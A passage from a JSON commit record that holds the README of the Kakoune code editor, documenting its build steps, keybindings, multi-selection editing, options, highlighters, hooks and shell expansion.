doc\n","repos":"jkonecny12\/kakoune,casimir\/kakoune,mawww\/kakoune,alpha123\/kakoune,danielma\/kakoune,Asenar\/kakoune,rstacruz\/kakoune,lenormf\/kakoune,elegios\/kakoune,jjthrash\/kakoune,Asenar\/kakoune,rstacruz\/kakoune,alpha123\/kakoune,Somasis\/kakoune,Somasis\/kakoune,xificurC\/kakoune,ekie\/kakoune,Asenar\/kakoune,lenormf\/kakoune,ekie\/kakoune,flavius\/kakoune,lenormf\/kakoune,occivink\/kakoune,danielma\/kakoune,zakgreant\/kakoune,ekie\/kakoune,mawww\/kakoune,flavius\/kakoune,jkonecny12\/kakoune,rstacruz\/kakoune,ekie\/kakoune,Asenar\/kakoune,Somasis\/kakoune,flavius\/kakoune,danr\/kakoune,occivink\/kakoune,jjthrash\/kakoune,alpha123\/kakoune,casimir\/kakoune,alpha123\/kakoune,elegios\/kakoune,alexherbo2\/kakoune,zakgreant\/kakoune,jkonecny12\/kakoune,danielma\/kakoune,elegios\/kakoune,lenormf\/kakoune,zakgreant\/kakoune,mawww\/kakoune,danr\/kakoune,elegios\/kakoune,jkonecny12\/kakoune,Somasis\/kakoune,zakgreant\/kakoune,alexherbo2\/kakoune,danr\/kakoune,jjthrash\/kakoune,xificurC\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,occivink\/kakoune,mawww\/kakoune,occivink\/kakoune,xificurC\/kakoune,danielma\/kakoune,alexherbo2\/kakoune,danr\/kakoune,casimir\/kakoune,xificurC\/kakoune,casimir\/kakoune,flavius\/kakoune,rstacruz\/kakoune","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"Kakoune\n=======\n\nIntroduction:\n-------------\n\nKakoune is a code editor heavily inspired by Vim, as such most of it's\ncommands are similar to vi's ones.\n\nKakoune can operate in two modes, normal and insertion. In insertion mode,\nkeys are directly inserted into the current buffer. In normal mode, keys\nare used to manipulate the current selection and to enter insertion mode.\n\nKakoune has a strong focus on interactivity, most commands provide immediate\nand incremental results, while still being competitive (as in keystroke count)\nwith Vim.\n\nKakoune works on selections, which are oriented, inclusive range of characters,\nselections have an anchor and a cursor character. Most commands move both of\nthem, except when extending selection where the anchor character stays fixed\nand the cursor one moves around.\n\nsee http:\/\/vimeo.com\/82711574\n\nJoin us on freenode IRC +#Kakoune+\n\nFeatures\n--------\n\n * Multiple selections as a central way of interacting\n * Powerful selection manipulation primitives\n - Select all regex matches in current selections\n - Keep selections containing\/not containing a match for a given regex\n - Split current selections with a regex\n - Text objects (paragraph, sentence, nestable blocks)\n * Powerful text manipulation primitives\n - Align selections\n - Rotate selection contents\n - Case manipulation\n - Indentation\n - Piping each selection to external filter\n * Client-Server architecture\n - Multiple clients on the same editing session\n - Use tmux or your X11 window manager to manage windows\n * Simple interaction with external programs\n * Automatic contextual help\n * Automatic as you type completion\n * Macros\n * Hooks\n * Syntax Highlighting\n\nBuilding\n--------\n\nKakoune dependencies are:\n\n * A C++11 compliant compiler (GCC >= 4.8.1 or clang >= 3.4)\n * boost (>= 1.50)\n * ncurses with wide-characters support (>= 5.3, generally refered as libncursesw)\n\nTo build, just type *make* in the src directory\n\nKakoune can be built on Linux, MacOS, and Cygwin. Due to Kakoune relying heavily\non being in an Unix like environment, no native Windows version is planned.\n\nTo setup a basic configuration on your account, type *make userconfig* in the\nsrc directory, this will setup an initial $XDG_CONFIG_HOME\/kak directory. See\nthe _Kakrc_ section for more information.\n\nInstalling\n----------\n\nIn order to install kak on your system, rather than running it directly from\nit's source directory, type *make install*, you can specify the +PREFIX+ and\n+DESTDIR+ if needed.\n\nNote that by default, no script files will be read if you do not add links\nto them in $XDG_CONFIG_HOME\/kak\/autoload. Available script files will be\ninstalled in $PREFIX\/share\/kak\/rc\n\nIf you want to enable all files, set $XDG_CONFIG_HOME\/kak\/autoload to be\na symbolic link to the $PREFIX\/share\/kak\/rc directory.\n\n----------------------------------------------\nln -s \/usr\/share\/kak\/rc ~\/.config\/kak\/autoload\n----------------------------------------------\n\nRunning\n-------\n\nJust running *kak* launch a new kak session with a client on local terminal.\n*kak* accepts some switches:\n\n * +-c <session>+: connect to given session, sessions are unix sockets\n +\/tmp\/kak-<session>+\n * +-e <commands>+: execute commands on startup\n * +-n+: ignore kakrc file\n * +-s <session>+: set the session name, by default it will be the pid\n of the initial kak process.\n * +-d+: run Kakoune in daemon mode, without user interface. This requires\n the session name to be specified with -s. In this mode, the Kakoune\n server will keep running even if there is no connected client, and\n will quit when receiving SIGTERM.\n * +-p <session>+: read stdin, and then send its content to the given session\n acting as a remote control.\n\nAt startup, if +-n+ is not specified, Kakoune will try to source the file\n..\/share\/kak\/kakrc relative to the kak binary. This kak file will then try\nto source $XDG_CONFIG_HOME\/kak\/kakrc (with $XDG_CONFIG_HOME defaulting to\n$HOME\/.config), and any files in $XDG_CONFIG_HOME\/kak\/autoload.\n\nThe common pattern is to add links to $XDG_CONFIG_HOME\/kak\/autoload to the\nscripts in $PREFIX\/share\/kak\/rc that the user wants sourced at kak launch.\n\nBasic Movement\n--------------\n\n * _space_: select the character under last selection end\n * _alt-space_: flip the selections direction\n\n * _h_: select the character on the right of selection end\n * _j_: select the character below the selection end\n * _k_: select the character above the selection end\n * _l_: select the character on the left of selection end\n\n * _w_: select the word and following whitespaces on the right of selection end\n * _b_: select preceding whitespaces and the word on the left of selection end\n * _e_: select preceding whitespaces and the word on the right of selection end\n * _alt-[wbe]_: same as [wbe] but select WORD instead of word\n\n * _x_: select line on which selection end lies (or next line when end lies on\n an end-of-line)\n * _alt-x_: expand selections to contain full lines (including end-of-lines)\n * _alt-X_: trim selections to only contain full lines (not including last\n end-of-line)\n\n * _%_: select whole buffer\n\n * _alt-H_: select to line begin\n * _alt-L_: select to line end\n\n * _\/_: search (select next match)\n * _?_: search (extend to next match)\n * _n_: select next match\n * _N_: add a new selection with next match\n * _alt-n_: replace main selection with next match (preserving the others)\n\n * _pageup_: scroll up\n * _pagedown_: scroll down\n\n * _alt-r_: rotate selections (the main selection becomes the next one)\n\nA word is a sequence of alphanumeric characters or underscore, a WORD is a\nsequence of non whitespace characters.\n\nAppending\n---------\n\nfor most selection commands, using shift permits to extend current selection\ninstead of replacing it. for example, _wWW_ selects 3 consecutive words\n\nUsing Counts\n------------\n\nMost selection commands also support counts, which are entered before the\ncommand itself.\n\nfor example, _3W_ selects 3 consecutive words and _3w_ select the third word on\nthe right of selection end.\n\n * _space_: when used with count, keep only the counth selection\n * _alt-space_: when used with count, remove the counth selection\n\nChanges\n-------\n\n * _i_: insert before current selection\n * _a_: insert after current selection\n * _d_: yank and delete current selection\n * _D_: yank concatenated and delete current selection (see _Y_)\n * _c_: yank and delete current selection and insert\n * _._: repeat last insert mode change (_i_, _a_, or _c_, including\n the inserted text)\n\n * _I_: insert at current selection begin line start\n * _A_: insert at current selection end line end\n * _o_: insert in a new line below current selection end\n * _O_: insert in a new line above current selection begin\n\n * _y_: yank selections\n * _Y_: yank selections concatenated (only one yank, containing\n all selection concatenated)\n * _p_: paste after current selection end\n * _P_: paste before current selection begin\n * _alt-p_: replace current selection with yanked text\n\n * _alt-j_: join selected lines\n * _alt-J_: join selected lines and select spaces inserted\n in place of line breaks\n\n * _>_: indent selected lines\n * _<_: deindent selected lines\n * _alt->_: indent selected lines, including empty lines\n * _<_: deindent selected lines\n * _alt-<_: deindent selected lines, do not remove incomplete\n indent (3 leading spaces when indent is 4)\n\n * _|_: pipe each selections through the given external filter program\n and replace the selection with it's output.\n * _alt-|_: pipe each selections through the given external filter program\n and append the selection with it's output.\n\n * _u_: undo last change\n * _U_: redo last change\n\n * _r_: replace each character with the next entered one\n * _&_: align selection, align the cursor of selections by inserting\n spaces before the first character of the selection\n * _alt-&_: copy indent, copy the indentation of the main selection\n (or the count one if a count is given) to all other ones\n\n * _`_: to lower case\n * _~_: to upper case\n * _alt-`_: swap case\n\n * _@_: convert tabs to spaces in current selections, uses the buffer\n tabstop option or the count parameter for tabstop.\n * _alt-@_: convert spaces to tabs in current selections, uses the buffer\n tabstop option or the count parameter for tabstop.\n\n * _alt-R_: rotate selections content, if specified, the count groups\n selections, so +3<a-R>+ rotate (1, 2, 3) and (3, 4, 6)\n independently.\n\nGoto Commands\n-------------\n\nCommands begining with g are used to goto certain position and or buffer:\n\n * _gh_: select to line begin\n * _gl_: select to line end\n\n * _gg_, _gk_: go to the first line\n * _gj_: go to the last line\n\n * _gt_, _gk_: go to the first displayed line\n * _gc_, _gk_: go to the middle displayed line\n * _gb_: go to the last displayed line\n\n * _ga_: go to the previous (alternate) buffer\n * _gf_: open the file whose name is selected\n\n * _g._: go to last buffer modifiction position\n\nView commands\n-------------\n\nSome commands, all begining with v permit to manipulate the current\nview.\n\n * _vv_ or _vc_: center the main selection in the window\n * _vt_: scroll to put the main selection on the top line of the window\n * _vb_: scroll to put the main selection on the bottom line of the window\n * _vh_: scroll the window count columns left\n * _vj_: scroll the window count line downward\n * _vk_: scroll the window count line upward\n * _vl_: scroll the window count columns right\n\nJump list\n---------\n\nSome commands, like the goto commands, buffer switch or search commands,\npush the previous selections to the client's jump list. It is possible\nto forward or backward in the jump list using:\n\n * _control-i_: Jump forward\n * _control-o_: Jump backward\n * _control-s_: save current selections\n\nMulti Selection\n---------------\n\nKak was designed from the start to handle multiple selections.\nOne way to get a multiselection is via the _s_ key.\n\nFor example, to change all occurences of word 'roger' to word 'marcel'\nin a paragraph, here is what can be done:\n\nselect the paragraph with enough _x_. press _s_ and enter roger then enter.\nnow paragraph selection was replaced with multiselection of each roger in\nthe paragraph. press _c_ and marcel<esc> to replace rogers with marcels.\n\nA multiselection can also be obtained with _S_, which splits the current\nselection according to the regex entered. To split a comma separated list,\nuse _S_ then ', *'\n\n_s_ and _S_ share the search pattern with _\/_, and hence entering an empty\npattern uses the last one.\n\nAs a convenience, _alt-s_ allows you to split the current selections on\nline boundaries.\n\nTo clear multiple selections, use _space_. To keep only the nth selection\nuse _n_ followed by _space_, to remove only the nth selection, use _n_\nfollowed by _alt-space_.\n\n_alt-k_ allows you to enter a regex and keep only the selections that\ncontains a match for this regex. using _alt-K_ you can keep the selections\nnot containing a match.\n\n_$_ allows you to enter a shell command and pipe each selections to it.\nSelections whose shell command returns 0 will be kept, other will be dropped.\n\nObject Selection\n----------------\n\nSome keys allow you to select a text object:\n\n * _alt-a_: selects the whole object\n * _alt-i_: selects the inner object, that is the object excluding it's surrounder.\n for example, for a quoted string, this will not select the quote, and\n for a word this will not select trailing spaces.\n * _[_: selects to object start\n * _]_: selects to object end\n * _{_: extends selections to object start\n * _}_: extends selections to object end\n\nAfter this key, you need to enter a second key in order to specify which\nobject you want.\n\n * _b_, _(_ or _)_: select the enclosing parenthesis\n * _B_, _{_ or _}_: select the enclosing {} block\n * _r_, _[_ or _]_: select the enclosing [] block\n * _a_, _<_ or _>_: select the enclosing <> block\n * _\"_: select the enclosing double quoted string\n * _'_: select the enclosing single quoted string\n * _`_: select the enclosing grave quoted string\n * _w_: select the whole word\n * _W_: select the whole WORD\n * _s_: select the sentence\n * _p_: select the paragraph\n * _i_: select the current indentation block\n * _n_: select the number\n\nFor nestable objects, a count can be used in order to specify which surrounding\nlevel to select.\n\nRegisters\n---------\n\nregisters are named list of text. They are used for various purpose, like\nstoring the last yanked test, or the captures groups associated with the\nselections.\n\nWhile in insert mode, ctrl-r followed by a register name (one character)\ninserts it.\n\nFor example, ctrl-r followed by \" will insert the currently yanked text.\nctrl-r followed by 2 will insert the second capture group from the last regex\nselection.\n\nRegisters are lists, instead of simply text in order to interact well with\nmultiselection. Each selection have it's own captures, or yank buffer.\n\nMacros\n------\n\nKakoune can record and replay a sequence of key press.\n\nWhen pressing the _Q_ key, followed by an alphabetic key for the macro name,\nKakoune begins macro recording: every pressed keys will be added to the\nmacro until the _Q_ key is pressed again.\n\nTo replay a macro, use the _q_ key, followed by the macro name.\n\nSearch selection\n----------------\n\nUsing the _*_ key, you can set the search pattern to the current selection.\nThis tries to be intelligent. It will for example detect if current selection\nbegins and\/or end at word boundaries, and set the search pattern accordingly.\n\nwith _alt-*_ you can set the search pattern to the current seletion without\nKakoune trying to be smart.\n\nBasic Commands\n--------------\n\nCommands are entered using +:+.\n\n * +e[dit] <filename> [<line> [<column>]]+: open buffer on file, go to given\n line and column. If file is already opened, just switch to this file.\n use edit! to force reloading.\n * +w[rite] [<filename>]+: write buffer to <filename> or use it's name if\n filename is not given.\n * +q[uit]+: exit Kakoune, use quit! to force quitting even if there is some\n unsaved buffers remaining.\n * +wq+: write current buffer and quit\n * +b[uffer] <name>+: switch to buffer <name>\n * +d[el]b[uf] [<name>]+: delete the buffer <name>, use d[el]b[uf]! to force\n deleting a modified buffer.\n * +source <filename>+: execute commands in <filename>\n * +runtime <filename>+: execute commands in <filename>, <filename>\n is relative to kak executable path.\n * +nameclient <name>+: set current client name\n * +namebuf <name>+: set current buffer name\n * +echo <text>+: show <text> in status line\n * +nop+: does nothing, but as with every other commands, arguments may be\n evaluated. So nop can be used for example to execute a shell command\n while being sure that it's output will not be interpreted by kak.\n +:%sh{ echo echo tchou }+ will echo tchou in Kakoune, whereas\n +:nop %sh{ echo echo tchou }+ will not, but both will execute the\n shell command.\n\nExec and Eval\n-------------\n\nthe +:exec+ and +:eval+ commands can be used for running Kakoune commands.\n+:exec+ keys as if they were pressed, whereas +:eval+ executes it's given\nparemeters as if they were entered in the command prompt. By default,\nthey do their execution in the context of the current client.\n\nSome parameters provide a way to change the context of execution:\n\n * +-client <name>+: execute in the context of the client named <name>\n * +-try-client <name>+: execute in the context of the client named\n <name> if such client exists, or else in the current context.\n * +-draft+: execute in a copy of the context of the selected client\n modifications to the selections or input state will not affect\n the client. This permits to make some modification to the buffer\n without modifying the user's selection.\n * +-itersel+ (requires +-draft+): execute once per selection, in a\n context with only the considered selection. This permits to avoid\n cases where the selections may get merged.\n * +-buffer <names>+: execute in the context of each buffers in the\n comma separated list <names>\n * +-no-hooks+: disable hook execution while executing the keys\/commands\n\nThe execution stops when the last key\/command is reached, or an error\nis raised.\n\nkey parameters gets concatenated, so the following commands are equivalent.\n\n----------------------\n:exec otest<space>1\n:exec o test <space> 1\n----------------------\n\nString syntax\n-------------\n\nWhen entering a command, parameters are separated by whitespace (shell like),\nif you want to give parameters with spaces, you should quote them.\n\nKakoune support three string syntax:\n\n * +\"strings\" and \\'strings\\'+: classic strings, use \\' or \\\" to escape the\n separator.\n\n * +%\\{strings\\}+: these strings are very useful when entering commands\n\n - the '{' and '}' delimiter are configurable: you can use any non\n alphanumeric character. like %[string], %<string>, %(string), %~string~\n or %!string!...\n - if the character following the % is one of {[(<, then the closing one is\n the matching }])> and the delimiters are not escapable but are nestable.\n for example +%{ roger {}; }+ is a valid string, +%{ marcel \\}+ as well.\n\nOptions\n-------\n\nFor user configuration, Kakoune supports options.\n\nOptions are typed, their type can be\n\n * +int+: an integer number\n * +bool+: a boolean value, +yes\/true+ or +no\/false+\n * +yesnoask+: similar to a boolean, but the additional\n value +ask+ is supported.\n * +str+: a string, some freeform text\n * +regex+: as a string but the +set+ commands will complain\n if the entered text is not a valid regex.\n * +{int,str}-list+: a list, elements are separated by a colon (:)\n if an element needs to contain a colon, it can be escaped with a\n backslash.\n\nOptions value can be changed using the +set+ commands:\n\n--------------------------------------------------------------\n:set [global,buffer,window] <option> <value> # buffer, window, or global scope\n--------------------------------------------------------------\n\nOption values can be different by scope, an option can have a global\nvalue, a buffer value and a window value. The effective value of an\noption depends on the current context. If we have a window in the\ncontext (interactive edition for example), then the window value\n(if any) is used, if not we try the buffer value (if we have a buffer\nin the context), and if not we use the global value.\n\nThat means that two windows on the same buffer can use different options\n(like different filetype, or different tabstop). However some options\nmight end up ignored if their scope is not in the command context:\n\nWriting a file never uses the window options for example, so any\noptions related to writing wont be taken into account if set in the\nwindow scope (+BOM+ or +eolformat+ for example).\n\nNew options can be declared using the +:decl+ command:\n\n---------------------------------------\n:decl [-hidden] <type> <name> [<value>]\n---------------------------------------\n\nthe +-hidden+ parameter makes the option invisible in completion, but\nstill modifiable.\n\nSome options are built in Kakoune, and can be used to control it's behaviour:\n\n * +tabstop+ _int_: width of a tab character.\n * +indentwidth+ _int_: width (in spaces) used for indentation.\n 0 means a tab character.\n * +scrolloff+ _int_: number of lines to keep visible above\/below\n the cursor when scrolling.\n * +eolformat+ _string_ ('lf' or 'crlf'): the format of end of lines when\n writing a buffer, this is autodetected on load.\n * +BOM+ _string_ (\"no\" or \"utf-8\"): define if the file should be written\n with an unicode byte order mark.\n * +complete_prefix+ _bool_: when completing in command line, and multiple\n candidates exist, enable completion with common prefix.\n * +incsearch+ _bool_: execute search as it is typed\n * +aligntab+ _bool_: use tabs for alignement command\n * +autoinfo+ _bool_: display automatic information box for certain commands.\n * +autoshowcompl+ _bool_: automatically display possible completions when\n editing a prompt.\n * +ignored_files+ _regex_: filenames matching this regex wont be considered\n as candidates on filename completion (except if the text being completed\n already matches it).\n * +filetype+ _str_: arbitrary string defining the type of the file\n filetype dependant actions should hook on this option changing for\n activation\/deactivation.\n * +path+ _str-list_: directories to search for gf command.\n * +completers+ _str-list_: completion systems to use for insert mode\n completion. given completers are tried in order until one generate some\n completion candidates. Existing completers are:\n - +word=all+ or +word=buffer+ which complete using words in all buffers\n (+word=all+) or only the current one (+word=buffer+)\n - +filename+ which tries to detect when a filename is being entered and\n provides completion based on local filesystem.\n - +option=<opt-name>+ where <opt-name> is a _str-list_ option. The first\n element of the list should follow the format:\n _<line>.<column>[+<length>]@<timestamp>_ to define where the completion\n apply in the buffer, and the other strings are the candidates.\n * +autoreload+ _yesnoask_: auto reload the buffers when an external\n modification is detected.\n\nInsert mode completion\n----------------------\n\nKakoune can propose completions while inserting text, the +completers+ option\ncontrol automatic completion, which kicks in when a certain idle timeout is\nreached (100 milliseconds). Insert mode completion can be explicitely triggered\nusing *control-x*, followed, by:\n\n * *f* : filename completion\n * *w* : buffer word completion\n * *l* : buffer line completion\n * *o* : option based completion\n\nHighlighters\n------------\n\nManipulation of the displayed text is done through highlighters, which can be added\nor removed with the command\n\n-----------------------------------------------------\n:addhl <highlighter_name> <highlighter_parameters...>\n-----------------------------------------------------\n\nand\n\n----------------------\n:rmhl <highlighter_id>\n----------------------\n\ngeneral highlighters are:\n\n * +regex <ex> <color>...+: highlight a regex, takes the regex as first parameter,\n followed by any number of color parameters. color format is:\n <capture_id>:<fg_color>[,<bg_color>]\n For example: `:addhl regex \/\/(\\h+TODO:)?[^\\n]+ 0:cyan 1:yellow,red`\n will highlight C++ style comments in cyan, with an eventual 'TODO:' in\n yellow on red background.\n * +search <color>+: highlight every matches to the current search pattern. takes\n one parameter for the color to apply to highlighted elements.\n * +flag_lines <flag> <option_name>+: add a column in front of text, and display the\n given flag in it for everly lines contained in the int-list option named\n <option_name>.\n * +show_matching+: highlight matching char of the character under the selections\n cursor using +MatchingChar+ color alias.\n * +number_lines+: show line numbers\n * +fill <color>+: fill with given color, mostly useful with region highlighters\n (see below)\n\nHighlighting Groups\n~~~~~~~~~~~~~~~~~~~\n\nthe +group+ highlighter is a container for other highlighters. You can add\na group to the current window using\n\n------------------\naddhl group <name>\n------------------\n\nand then the +-group+ switch of +addhl+ provides a mean to add highlighters\ninside this group.\n\n--------------------------------------\naddhl -group <name> <type> <params>...\n--------------------------------------\n\ngroups can contain other groups, the +-group+ switch can be used to define a path.\n\n------------------------------------------------\naddhl -group <name> group <subname>\naddhl -group <name>\/<subname> <type> <params>...\n------------------------------------------------\n\nRegion highlighters\n~~~~~~~~~~~~~~~~~~~\n\nThe +region+ highlighters takes 3 to 4 parameters:\n\n---------------------------------------------------\naddhl region <name> <opening> <closing> [<recurse>]\n---------------------------------------------------\n\n+name+ is user defined, but +opening+, +closing+ and +recurse+ are regexes.\n\n * +opening+ defines the region start text\n * +closing+ defines the region end text\n * +recurse+ defines the text that matches recursively an end token into the region.\n\n+recurse+ is useful for regions that can be nested, for example the +%sh{ ... }+\nconstruct in kakoune accept nested +{ ... }+ so +%sh{ ... { ... } ... }+ is valid.\nthis region can be defined with:\n\n-------------------------------------\naddhl region shell_expand %sh\\{ \\} \\{\n-------------------------------------\n\nIt then provides a group named +content+ which can be filled with other highlighters\nthat will only be applied on the given regions.\n\n-------------------------------------\naddhl -group shell_expand\/content ...\n-------------------------------------\n\nThe +multi_region+ highlighter is even more powerfull, it can segment the buffer\nin non overlapping regions.\n\n-------------------------------------------------------------------------\naddhl multi_region <name> <region_name1> <opening1> <closing1> <recurse1> \\\n <region_name2> <opening2> <closing2> <recurse2>...\n-------------------------------------------------------------------------\n\ndefines multiple regions in which other highlighters can be added\n\n-------------------------------------\naddhl -group <name>\/<region_name> ...\n-------------------------------------\n\nRegions are matched using the left-most rule: the left-most region opening starts\na new region. when a region closes, the closest next opening start another region.\n\nThat matches the rule governing most programming language parsing.\n\n+multi_region+ also supports a +-default <default_region>+ switch to define the\ndefault region, when no other region matches the current buffer range.\n\nmost programming languages can then be properly highlighted using a +multi_region+\nhighlighter as root:\n\n-----------------------------------------------------------------\naddhl multi_region -default code <lang> \\\n string <str_opening> <str_closing> <str_recurse> \\\n comment <comment_opening> <comment_closing> <comment_recurse>\n\naddhl -group <lang>\/code ...\naddhl -group <lang>\/string ...\naddhl -group <lang>\/comment ...\n-----------------------------------------------------------------\n\nShared Highlighters\n~~~~~~~~~~~~~~~~~~~\n\nHighlighters are often defined for a specific filetype, and it makes then sense to\nshare the highlighters between all the windows on the same filetypes.\n\nA shared highlighter can be defined with the +:addhl+ command\n\n------------------------------\naddhl -group \/<group_name> ...\n------------------------------\n\nwhen the group switch values starts with a '\/', it references a group in the\nshared highlighters, rather than the window highlighters.\n\nThe common case would be to create a named shared group, and then fill it\nwith highlighters:\n\n---------------------------\naddhl -group \/ group <name>\naddhl -group \/name regex ...\n---------------------------\n\nIt can then be referenced in a window using the +ref+ highlighter.\n\n----------------\naddhl ref <name>\n----------------\n\nthe +ref+ can reference any named highlighter in the shared namespace.\n\nHooks\n-----\n\ncommands can be registred to be executed when certain events arise.\nto register a hook, use the hook command.\n\n------------------------------------------------------\n:hook <scope> <hook_name> <filtering_regex> <commands>\n------------------------------------------------------\n\n<scope> can be either global, buffer or window (or any of their prefixes),\nthe scope are hierarchical, meaning that a Window calling a hook will\nexecute it's own, the buffer ones and the global ones.\n\n<command> is a string containing the commands to execute when the hook is\ncalled.\n\nfor example, to automatically use line numbering with .cc files,\nuse the following command:\n\n-----------------------------------------------------\n:hook global WinCreate .*\\.cc %{ addhl number_lines }\n-----------------------------------------------------\n\nexisting hooks are:\n\n * +NormalIdle+: A certain duration has passed since last key was pressed in\n normal mode.\n * +NormalBegin+: Entering normal mode\n * +NormalEnd+: Leaving normal mode\n * +NormalKey+: A key is received in normal mode, the key is used for filtering\n * +InsertIdle+: A certain duration has passed since last key was pressed in\n insert mode.\n * +InsertBegin+: Entering insert mode\n * +InsertEnd+: Leaving insert mode\n * +InsertKey+: A key is received in insert mode, the key is used for filtering\n * +InsertMove+: The cursor moved (without inserting) in insert mode, the key\n that triggered the move is used for filtering\n * +WinCreate+: A window was created, the filtering text is the buffer name\n * +WinClose+: A window was detroyed, the filtering text is the buffer name\n * +WinDisplay+: A window was bound a client, the filtering text is the buffer\n name\n * +WinSetOption+: An option was set in a window context, the filtering text\n is '<option_name>=<new_value>'\n * +BufSetOption+: An option was set in a buffer context, the filtering text\n is '<option_name>=<new_value>'\n * +BufNew+: A buffer for a new file has been created, filename is used for\n filtering\n * +BufOpen+: A buffer for an existing file has been created, filename is\n used for filtering\n * +BufCreate+: A buffer has been created, filename is used for filtering\n * +BufWritePre+: Executre just before a buffer is written, filename is\n used for filtering.\n * +BufWritePost+: Executre just after a buffer is written, filename is\n used for filtering.\n * +RuntimeError+: an error was encountered while executing an user command\n the error message is used for filtering\n * +KakBegin+: Kakoune started, this is called just after reading the user\n configuration files\n * +KakEnd+: Kakoune is quitting.\n\nwhen not specified, the filtering text is an empty string.\n\nKey Mapping\n-----------\n\nYou can redefine keys meaning using the map command\n\n------------------------------------------------------\n:map <scope> <mode> <key> <keys>\n------------------------------------------------------\n\nwith +scope+ being one of +global, buffer or window+ (or any prefix),\nmode being +insert, normal, prompt or menu+ (or any prefix), +key+ being\na single key name and +keys+ a list of keys.\n\nColor Aliases\n-------------\n\nColorspec takes the form <fg_color>[,<bg_color>], they can be named using the\nfollowing command.\n\n--------------------------\n:colalias <name> <colspec>\n--------------------------\n\nnote that colspec can itself be a color alias.\n\nUsing color alias instead of colorspec permits to change the effective colors\nafterward.\n\nthere are some builtins color aliases:\n\n * +PrimarySelection+: main selection color for every selected character except\n the cursor\n * +SecondarySelection+: secondary selection color for every selected character\n except the cursor\n * +PrimaryCursor+: cursor of the primary selection\n * +SecondaryCursor+: cursor of the secondary selection\n * +LineNumbers+: colors used by the number_lines highlighter\n * +MenuForeground+: colors for the selected element in menus\n * +MenuBackground+: colors for the not selected elements in menus\n * +Information+: colors the informations windows and information messages\n * +Error+: colors of error messages\n * +StatusLine+: colors used for the status line\n * +StatusCursor+: colors used for the status line cursor\n * +Prompt+: colors used prompt displayed on the status line\n\nShell expansion\n---------------\n\nA special string syntax is supported which replace it's content with the\noutput of the shell commands in it, it is similar to the shell $(...)\nsyntax and is evaluated only when needed.\nfor example: %sh{ ls } is replaced with the output of the ls command.\n\nSome of Kakoune state is available through environment variables:\n\n * +kak_selection+: content of the main selection\n * +kak_selections+: content of the selection separated by colons, colons in\n the selection contents are escapted with a backslash.\n * +kak_bufname+: name of the current buffer\n * +kak_timestamp+: timestamp of the current buffer, the timestamp is an\n integer value which is incremented each time the buffer is modified.\n * +kak_runtime+: directory containing the kak binary\n * +kak_opt_<name>+: value of option <name>\n * +kak_reg_<r>+: value of register <r>\n * +kak_socket+: filename of session socket (\/tmp\/kak-<session>)\n * +kak_client+: name of current client\n * +kak_cursor_line+: line of the end of the main selection\n * +kak_cursor_column+: column of the end of the main selection (in byte)\n * +kak_cursor_char_column+: column of the end of the main selection (in character)\n * +kak_hook_param+: filtering text passed to the currently executing hook\n\nNote that in order to make only needed information available, Kakoune needs\nto find the environment variable reference in the shell script executed.\nHence +%sh{ .\/script.sh }+ with +script.sh+ referencing an environment\nvariable will not work.\n\nfor example you can print informations on the current file in the status\nline using:\n\n-------------------------------\n:echo %sh{ ls -l $kak_bufname }\n-------------------------------\n\nRegister and Option expansion\n-----------------------------\n\nSimilar to shell expansion, register contents and options values can be\naccessed through %reg{<register>} and %opt{<option>} syntax.\n\nfor example you can display last search pattern with\n\n-------------\n:echo %reg{\/}\n-------------\n\nDefining Commands\n-----------------\n\nnew commands can be defined using the +:def+ command.\n\n------------------------------\n:def <command_name> <commands>\n------------------------------\n\n<commands> is a string containing the commands to execute\n\ndef can also takes some flags:\n\n * +-env-params+: pass parameters given to commands in the environment as\n kak_paramN with N the parameter number\n * +-shell-params+: pass parameters given to commands as positional parameters\n to any shell expansions used in the command.\n * +-file-completion+: try file completion on any parameter passed\n to this command\n * +-shell-completion+: following string is a shell command which takes\n parameters as positional params and output one\n completion candidate per line.\n * +-allow-override+: allow the new command to replace an exisiting one\n with the same name.\n * +-hidden+: do not show the command in command name completions\n * +-docstring+: define the documentation string for the command\n\nUsing shell expansion permits to define complex commands or to access\nKakoune state:\n\n------------------------------------------------------\n:def print_selection %{ echo %sh{ ${kak_selection} } }\n------------------------------------------------------\n\nSome helper commands can be used to define composite commands:\n\n * +:prompt <prompt> <register> <command>+: Prompt the user for a string, when\n the user validates, store the result in given <register> and run <commmand>.\n the -init <str> switch allows setting initial content. \n * +:menu <label1> <commands1> <label2> <commands2>...+: display a menu using\n labels, the selected label's commands are executed.\n +menu+ can take a -auto-single argument, to automatically run commands\n when only one choice is provided. and a -select-cmds argument, in which\n case menu takes three argument per item, the last one being a command\n to execute when the item is selected (but not validated).\n * +:info <text>+: display text in an information box, at can take a -anchor\n option, which accepts +left+, +right+ and +cursor+ as value, in order to\n specify where the info box should be anchored relative to the main selection.\n * +:try <commands> catch <on_error_commands>+: prevent an error in <commands>\n from aborting the whole commands execution, execute <on_error_commands>\n instead. If nothing is to be done on error, the catch part can be ommitted.\n * +:reg <name> <content>+: set register <name> to <content>\n\nNote that these commands are available in interactive command mode, but are\nnot that useful in this context.\n\nFIFO Buffer\n-----------\n\nthe +:edit+ command can take a -fifo parameter:\n\n---------------------------------------------\n:edit -fifo <filename> [-scroll] <buffername>\n---------------------------------------------\n\nin this case, a buffer named +<buffername>+ is created which reads its content\nfrom fifo +<filename>+. When the fifo is written to, the buffer is automatically\nupdated.\n\nif the +-scroll+ switch is specified, the initial cursor position will be made\nsuch as the window displaying the buffer will scroll as new data is read.\n\nThis is very useful for running some commands asynchronously while displaying\ntheir result in a buffer. See rc\/make.kak and rc\/grep.kak for examples.\n\nWhen the buffer is deleted, the fifo will be closed, so any program writing\nto it will receive SIGPIPE. This is usefull as it permits to stop the writing\nprogram when the buffer is deleted.\n\nMenus\n-----\n\nWhen a menu is displayed, you can use *j*, *control-n* or *tab* to select the next\nentry, and *k*, *control-p* or *shift-tab* to select the previous one.\n\nUsing the *\/* key, you can enter some regex in order to restrict available choices\nto the matching ones.\n\nKakrc\n-----\n\nThe kakrc file next to the kak binary (in the src directory for the moment)\nis a list of kak commands to be executed at startup.\n\nThe current behaviour is to execute local user commands in the file\n$HOME\/.config\/kak\/kakrc and in all files in $HOME\/.config\/kak\/autoload\ndirectory\n\nPlace links to the files in src\/rc\/ in your autoload directory in order to\nexecute them on startup, or use the runtime command (which sources relative\nto the kak binary) to load them on demand.\n\nExisting commands files are:\n\n * *rc\/kakrc.kak*: provides kak commands files autodetection and highlighting\n * *rc\/cpp.kak*: provides C\/CPP files autodetection and highlighting and the\n +:alt+ command for switching from 